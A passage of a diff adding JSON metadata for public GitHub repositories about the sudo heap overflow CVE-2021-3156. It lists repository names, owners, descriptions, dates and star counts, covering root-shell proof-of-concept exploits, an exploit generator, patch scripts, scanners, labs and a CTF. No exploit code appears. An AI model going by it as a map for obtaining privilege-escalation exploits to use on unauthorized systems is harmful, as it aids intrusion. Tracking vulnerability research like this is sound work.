+ "pushed_at": "2021-01-31T04:02:08Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 334594270,
+ "name": "CVE-2021-3156",
+ "full_name": "Q4n\/CVE-2021-3156",
+ "owner": {
+ "login": "Q4n",
+ "id": 48317526,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48317526?v=4",
+ "html_url": "https:\/\/github.com\/Q4n"
+ },
+ "html_url": "https:\/\/github.com\/Q4n\/CVE-2021-3156",
+ "description": "复现别人家的CVEs系列",
+ "fork": false,
+ "created_at": "2021-01-31T07:01:50Z",
+ "updated_at": "2022-11-09T18:11:04Z",
+ "pushed_at": "2021-01-31T07:02:44Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 334697314,
+ "name": "CVE-2021-3156",
+ "full_name": "kal1gh0st\/CVE-2021-3156",
+ "owner": {
+ "login": "kal1gh0st",
+ "id": 56889513,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56889513?v=4",
+ "html_url": "https:\/\/github.com\/kal1gh0st"
+ },
+ "html_url": "https:\/\/github.com\/kal1gh0st\/CVE-2021-3156",
+ "description": "Description Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via \"sudoedit -s\" and a command-line argument that ends with a single backslash character. ",
+ "fork": false,
+ "created_at": "2021-01-31T16:10:11Z",
+ "updated_at": "2021-12-15T00:43:34Z",
+ "pushed_at": "2021-05-04T14:41:30Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 334775019,
+ "name": "docker-CVE-2021-3156",
+ "full_name": "apogiatzis\/docker-CVE-2021-3156",
+ "owner": {
+ "login": "apogiatzis",
+ "id": 39923420,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39923420?v=4",
+ "html_url": "https:\/\/github.com\/apogiatzis"
+ },
+ "html_url": "https:\/\/github.com\/apogiatzis\/docker-CVE-2021-3156",
+ "description": "A docker environment to research CVE-2021-3156",
+ "fork": false,
+ "created_at": "2021-01-31T22:58:13Z",
+ "updated_at": "2023-09-28T11:24:32Z",
+ "pushed_at": "2021-01-31T23:03:51Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 334790116,
+ "name": "CVE-2021-3156",
+ "full_name": "voidlsd\/CVE-2021-3156",
+ "owner": {
+ "login": "voidlsd",
+ "id": 46201891,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46201891?v=4",
+ "html_url": "https:\/\/github.com\/voidlsd"
+ },
+ "html_url": "https:\/\/github.com\/voidlsd\/CVE-2021-3156",
+ "description": "a simple script to patch CVE-2021-3156 (heap based buffer overflow via sudo).",
+ "fork": false,
+ "created_at": "2021-02-01T00:41:55Z",
+ "updated_at": "2021-02-01T00:42:21Z",
+ "pushed_at": "2021-02-01T00:42:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 334914030,
+ "name": "CVE-2021-3156-Patch",
+ "full_name": "Ashish-dawani\/CVE-2021-3156-Patch",
+ "owner": {
+ "login": "Ashish-dawani",
+ "id": 11299833,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11299833?v=4",
+ "html_url": "https:\/\/github.com\/Ashish-dawani"
+ },
+ "html_url": "https:\/\/github.com\/Ashish-dawani\/CVE-2021-3156-Patch",
+ "description": "Patch Script for CVE-2021-3156 Heap Overflow",
+ "fork": false,
+ "created_at": "2021-02-01T10:35:03Z",
+ "updated_at": "2021-02-01T11:24:51Z",
+ "pushed_at": "2021-02-01T11:24:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 335050084,
+ "name": "ScannerCVE-2021-3156",
+ "full_name": "SantiagoSerrao\/ScannerCVE-2021-3156",
+ "owner": {
+ "login": "SantiagoSerrao",
+ "id": 49415402,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49415402?v=4",
+ "html_url": "https:\/\/github.com\/SantiagoSerrao"
+ },
+ "html_url": "https:\/\/github.com\/SantiagoSerrao\/ScannerCVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-01T18:46:34Z",
+ "updated_at": "2021-09-28T20:54:25Z",
+ "pushed_at": "2021-02-01T18:50:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 335558169,
+ "name": "CTF-2021",
+ "full_name": "DanielAzulayy\/CTF-2021",
+ "owner": {
+ "login": "DanielAzulayy",
+ "id": 69147968,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69147968?v=4",
+ "html_url": "https:\/\/github.com\/DanielAzulayy"
+ },
+ "html_url": "https:\/\/github.com\/DanielAzulayy\/CTF-2021",
+ "description": "CTF for HDE 64 students at See Security College. Exploit a JWT (web part) & CVE-2021-3156 (LPE part).",
+ "fork": false,
+ "created_at": "2021-02-03T08:36:01Z",
+ "updated_at": "2021-05-05T10:52:48Z",
+ "pushed_at": "2021-03-05T16:22:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "ctf",
+ "lpe",
+ "users-solving"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 335565227,
+ "name": "Serpentiel-CVE-2021-3156",
+ "full_name": "cdeletre\/Serpentiel-CVE-2021-3156",
+ "owner": {
+ "login": "cdeletre",
+ "id": 12409537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12409537?v=4",
+ "html_url": "https:\/\/github.com\/cdeletre"
+ },
+ "html_url": "https:\/\/github.com\/cdeletre\/Serpentiel-CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-03T09:04:14Z",
+ "updated_at": "2021-10-12T18:17:20Z",
+ "pushed_at": "2021-02-03T09:04:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 335576846,
+ "name": "CVE-2021-3156",
+ "full_name": "dinhbaouit\/CVE-2021-3156",
+ "owner": {
+ "login": "dinhbaouit",
+ "id": 17717385,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17717385?v=4",
+ "html_url": "https:\/\/github.com\/dinhbaouit"
+ },
+ "html_url": "https:\/\/github.com\/dinhbaouit\/CVE-2021-3156",
+ "description": "CVE-2021-3156 Vagrant Lab",
+ "fork": false,
+ "created_at": "2021-02-03T09:48:46Z",
+ "updated_at": "2022-11-09T18:11:06Z",
+ "pushed_at": "2021-02-03T10:58:39Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 335739221,
+ "name": "CVE-2021-3156",
+ "full_name": "CptGibbon\/CVE-2021-3156",
+ "owner": {
+ "login": "CptGibbon",
+ "id": 16000770,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16000770?v=4",
+ "html_url": "https:\/\/github.com\/CptGibbon"
+ },
+ "html_url": "https:\/\/github.com\/CptGibbon\/CVE-2021-3156",
+ "description": "Root shell PoC for CVE-2021-3156",
+ "fork": false,
+ "created_at": "2021-02-03T19:57:56Z",
+ "updated_at": "2024-05-31T15:27:42Z",
+ "pushed_at": "2022-02-13T12:21:53Z",
+ "stargazers_count": 142,
+ "watchers_count": 142,
+ "has_discussions": false,
+ "forks_count": 60,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 60,
+ "watchers": 142,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 336220602,
+ "name": "sudo-1.8.3p1-patched",
+ "full_name": "perlun\/sudo-1.8.3p1-patched",
+ "owner": {
+ "login": "perlun",
+ "id": 630613,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/630613?v=4",
+ "html_url": "https:\/\/github.com\/perlun"
+ },
+ "html_url": "https:\/\/github.com\/perlun\/sudo-1.8.3p1-patched",
+ "description": "Custom version of sudo 1.8.3p1 with CVE-2021-3156 patches applied",
+ "fork": false,
+ "created_at": "2021-02-05T09:13:17Z",
+ "updated_at": "2021-02-05T09:25:37Z",
+ "pushed_at": "2021-02-05T09:25:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 336638175,
+ "name": "CVE-2021-3156-PoC",
+ "full_name": "1N53C\/CVE-2021-3156-PoC",
+ "owner": {
+ "login": "1N53C",
+ "id": 34792428,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34792428?v=4",
+ "html_url": "https:\/\/github.com\/1N53C"
+ },
+ "html_url": "https:\/\/github.com\/1N53C\/CVE-2021-3156-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-06T21:16:11Z",
+ "updated_at": "2023-03-09T02:25:06Z",
+ "pushed_at": "2021-02-06T21:20:04Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 337169035,
+ "name": "CVE-2021-3156",
+ "full_name": "0xdevil\/CVE-2021-3156",
+ "owner": {
+ "login": "0xdevil",
+ "id": 52781556,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52781556?v=4",
+ "html_url": "https:\/\/github.com\/0xdevil"
+ },
+ "html_url": "https:\/\/github.com\/0xdevil\/CVE-2021-3156",
+ "description": "CVE-2021-3156: Sudo heap overflow exploit for Debian 10",
+ "fork": false,
+ "created_at": "2021-02-08T18:21:58Z",
+ "updated_at": "2024-04-11T10:22:32Z",
+ "pushed_at": "2021-12-03T14:34:18Z",
+ "stargazers_count": 50,
+ "watchers_count": 50,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 50,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 337321053,
+ "name": "cve-2021-3156",
+ "full_name": "gmldbd94\/cve-2021-3156",
+ "owner": {
+ "login": "gmldbd94",
+ "id": 26623299,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26623299?v=4",
+ "html_url": "https:\/\/github.com\/gmldbd94"
+ },
+ "html_url": "https:\/\/github.com\/gmldbd94\/cve-2021-3156",
+ "description": "보안취약점 확인",
+ "fork": false,
+ "created_at": "2021-02-09T07:06:49Z",
+ "updated_at": "2021-02-09T07:22:16Z",
+ "pushed_at": "2021-02-09T07:22:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 337331342,
+ "name": "CVE-2021-3156",
+ "full_name": "jm33-m0\/CVE-2021-3156",
+ "owner": {
+ "login": "jm33-m0",
+ "id": 10167884,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10167884?v=4",
+ "html_url": "https:\/\/github.com\/jm33-m0"
+ },
+ "html_url": "https:\/\/github.com\/jm33-m0\/CVE-2021-3156",
+ "description": "sudo heap overflow to LPE, in Go",
+ "fork": false,
+ "created_at": "2021-02-09T07:55:47Z",
+ "updated_at": "2024-02-20T07:02:34Z",
+ "pushed_at": "2021-02-09T08:11:04Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 337512578,
+ "name": "CVE-2021-3156-plus",
+ "full_name": "Rvn0xsy\/CVE-2021-3156-plus",
+ "owner": {
+ "login": "Rvn0xsy",
+ "id": 19944759,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19944759?v=4",
+ "html_url": "https:\/\/github.com\/Rvn0xsy"
+ },
+ "html_url": "https:\/\/github.com\/Rvn0xsy\/CVE-2021-3156-plus",
+ "description": "CVE-2021-3156非交互式执行命令",
+ "fork": false,
+ "created_at": "2021-02-09T19:25:18Z",
+ "updated_at": "2024-06-18T07:38:01Z",
+ "pushed_at": "2021-02-09T19:31:33Z",
+ "stargazers_count": 197,
+ "watchers_count": 197,
+ "has_discussions": false,
+ "forks_count": 41,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 41,
+ "watchers": 197,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 338208683,
+ "name": "how-to-solve-sudo-heap-based-bufferoverflow-vulnerability",
+ "full_name": "r3k4t\/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability",
+ "owner": {
+ "login": "r3k4t",
+ "id": 69615463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69615463?v=4",
+ "html_url": "https:\/\/github.com\/r3k4t"
+ },
+ "html_url": "https:\/\/github.com\/r3k4t\/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability",
+ "description": "How to solve Sudo Heap-Based Buffer Overflow Vulnerability — CVE-2021-3156?",
+ "fork": false,
+ "created_at": "2021-02-12T02:44:30Z",
+ "updated_at": "2022-12-21T07:01:25Z",
+ "pushed_at": "2021-02-12T10:21:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 341413027,
+ "name": "CVE-2021-3156",
+ "full_name": "oneoy\/CVE-2021-3156",
+ "owner": {
+ "login": "oneoy",
+ "id": 38435398,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38435398?v=4",
+ "html_url": "https:\/\/github.com\/oneoy"
+ },
+ "html_url": "https:\/\/github.com\/oneoy\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-23T03:14:36Z",
+ "updated_at": "2023-09-28T11:25:12Z",
+ "pushed_at": "2021-02-23T03:14:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 348065462,
+ "name": "CVE-2021-3156",
+ "full_name": "worawit\/CVE-2021-3156",
+ "owner": {
+ "login": "worawit",
+ "id": 1352296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1352296?v=4",
+ "html_url": "https:\/\/github.com\/worawit"
+ },
+ "html_url": "https:\/\/github.com\/worawit\/CVE-2021-3156",
+ "description": "Sudo Baron Samedit Exploit",
+ "fork": false,
+ "created_at": "2021-03-15T17:37:02Z",
+ "updated_at": "2024-06-26T05:22:04Z",
+ "pushed_at": "2022-01-13T05:48:01Z",
+ "stargazers_count": 717,
+ "watchers_count": 717,
+ "has_discussions": false,
+ "forks_count": 167,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 167,
+ "watchers": 717,
+ "score": 0,
+ "subscribers_count": 11
+ },
+ {
+ "id": 349444222,
+ "name": "CVE-2021-3156",
+ "full_name": "lmol\/CVE-2021-3156",
+ "owner": {
+ "login": "lmol",
+ "id": 1568731,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1568731?v=4",
+ "html_url": "https:\/\/github.com\/lmol"
+ },
+ "html_url": "https:\/\/github.com\/lmol\/CVE-2021-3156",
+ "description": "Exploit generator for sudo CVE-2021-3156",
+ "fork": false,
+ "created_at": "2021-03-19T14:06:09Z",
+ "updated_at": "2022-03-16T16:30:23Z",
+ "pushed_at": "2021-03-25T23:52:40Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 352891561,
+ "name": "CVE-2021-3156",
+ "full_name": "BearCat4\/CVE-2021-3156",
+ "owner": {
+ "login": "BearCat4",
+ "id": 42698332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42698332?v=4",
+ "html_url": "https:\/\/github.com\/BearCat4"
+ },
+ "html_url": "https:\/\/github.com\/BearCat4\/CVE-2021-3156",
+ "description": "CVE-2021-3156漏洞修复Shell",
+ "fork": false,
+ "created_at": "2021-03-30T06:17:44Z",
+ "updated_at": "2022-08-22T03:19:22Z",
+ "pushed_at": "2021-03-30T06:58:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 354429117,
+ "name": "CVE-2021-3156",
+ "full_name": "ZTK-009\/CVE-2021-3156",
+ "owner": {
+ "login": "ZTK-009",
+ "id": 29515145,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29515145?v=4",
+ "html_url": "https:\/\/github.com\/ZTK-009"
+ },
+ "html_url": "https:\/\/github.com\/ZTK-009\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-04T01:15:05Z",
+ "updated_at": "2021-04-04T01:15:15Z",
+ "pushed_at": "2021-04-04T01:15:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 354924420,
+ "name": "CVE-2021-3156",
+ "full_name": "capturingcats\/CVE-2021-3156",
+ "owner": {
+ "login": "capturingcats",
+ "id": 81662965,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81662965?v=4",
+ "html_url": "https:\/\/github.com\/capturingcats"
+ },
+ "html_url": "https:\/\/github.com\/capturingcats\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-05T18:00:43Z",
+ "updated_at": "2021-04-05T18:39:34Z",
+ "pushed_at": "2021-04-05T18:03:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 362713324,
+ "name": "pwnedit",
+ "full_name": "LiveOverflow\/pwnedit",
+ "owner": {
+ "login": "LiveOverflow",
+ "id": 12161158,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12161158?v=4",
+ "html_url": "https:\/\/github.com\/LiveOverflow"
+ },
+ "html_url": "https:\/\/github.com\/LiveOverflow\/pwnedit",
+ "description": "CVE-2021-3156 - Sudo Baron Samedit",
+ "fork": false,
+ "created_at": "2021-04-29T06:29:26Z",
+ "updated_at": "2024-06-22T04:40:10Z",
+ "pushed_at": "2022-02-12T19:33:07Z",
+ "stargazers_count": 217,
+ "watchers_count": 217,
+ "has_discussions": false,
+ "forks_count": 36,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 36,
+ "watchers": 217,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 364464496,
+ "name": "CVE-2021-3156-Mitigation-ShellScript-Build",
+ "full_name": "ajtech-hue\/CVE-2021-3156-Mitigation-ShellScript-Build",
+ "owner": {
+ "login": "ajtech-hue",
+ "id": 60117733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60117733?v=4",
+ "html_url": "https:\/\/github.com\/ajtech-hue"
+ },
+ "html_url": "https:\/\/github.com\/ajtech-hue\/CVE-2021-3156-Mitigation-ShellScript-Build",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-05T04:51:03Z",
+ "updated_at": "2021-05-05T04:58:52Z",
+ "pushed_at": "2021-05-05T04:58:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 380136612,
+ "name": "CVE-2021-3156",
+ "full_name": "donghyunlee00\/CVE-2021-3156",
+ "owner": {
+ "login": "donghyunlee00",
+ "id": 26313346,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26313346?v=4",
+ "html_url": "https:\/\/github.com\/donghyunlee00"
+ },
+ "html_url": "https:\/\/github.com\/donghyunlee00\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-25T05:45:11Z",
+ "updated_at": "2021-06-25T06:11:02Z",
+ "pushed_at": "2021-06-25T06:10:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 381790796,
+ "name": "CVE-2021-3156",
+ "full_name": "TheFlash2k\/CVE-2021-3156",
+ "owner": {
+ "login": "TheFlash2k",
+ "id": 19727349,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19727349?v=4",
+ "html_url": "https:\/\/github.com\/TheFlash2k"
+ },
+ "html_url": "https:\/\/github.com\/TheFlash2k\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-30T18:00:03Z",
+ "updated_at": "2022-11-09T18:12:46Z",
+ "pushed_at": "2021-06-30T18:00:24Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 389541328,
+ "name": "CVE-2021-3156",
+ "full_name": "Exodusro\/CVE-2021-3156",
+ "owner": {
+ "login": "Exodusro",
+ "id": 27811489,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27811489?v=4",
+ "html_url": "https:\/\/github.com\/Exodusro"
+ },
+ "html_url": "https:\/\/github.com\/Exodusro\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-26T07:08:55Z",
+ "updated_at": "2021-10-21T21:30:42Z",
+ "pushed_at": "2021-07-25T23:01:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 393627940,
+ "name": "CVE-2021-3156",
+ "full_name": "CyberCommands\/CVE-2021-3156",
+ "owner": {
+ "login": "CyberCommands",
+ "id": 78230607,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78230607?v=4",
+ "html_url": "https:\/\/github.com\/CyberCommands"
+ },
+ "html_url": "https:\/\/github.com\/CyberCommands\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-07T08:38:50Z",
+ "updated_at": "2021-08-07T08:43:21Z",
+ "pushed_at": "2021-08-07T08:43:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 395682414,
+ "name": "CVE-2021-3156",
+ "full_name": "0x7183\/CVE-2021-3156",
+ "owner": {
+ "login": "0x7183",
+ "id": 75803943,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75803943?v=4",
+ "html_url": "https:\/\/github.com\/0x7183"
+ },
+ "html_url": "https:\/\/github.com\/0x7183\/CVE-2021-3156",
+ "description": "Sudo Heap Overflow Baron Samedit",
+ "fork": false,
+ "created_at": "2021-08-13T14:23:09Z",
+ "updated_at": "2021-11-18T11:57:37Z",
+ "pushed_at": "2021-10-12T20:51:00Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 410319200,
+ "name": "sudo-exploit",
+ "full_name": "redhawkeye\/sudo-exploit",
+ "owner": {
+ "login": "redhawkeye",
+ "id": 90817826,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90817826?v=4",
+ "html_url": "https:\/\/github.com\/redhawkeye"
+ },
+ "html_url": "https:\/\/github.com\/redhawkeye\/sudo-exploit",
+ "description": "CVE-2021-3156 - sudo exploit for ubuntu 18.04 & 20.04",
+ "fork": false,
+ "created_at": "2021-09-25T16:11:19Z",
+ "updated_at": "2024-06-24T06:06:16Z",
+ "pushed_at": "2021-09-25T16:13:19Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 410761927,
+ "name": "CVE-2021-3156",
+ "full_name": "d3c3ptic0n\/CVE-2021-3156",
+ "owner": {
+ "login": "d3c3ptic0n",
+ "id": 50361425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50361425?v=4",
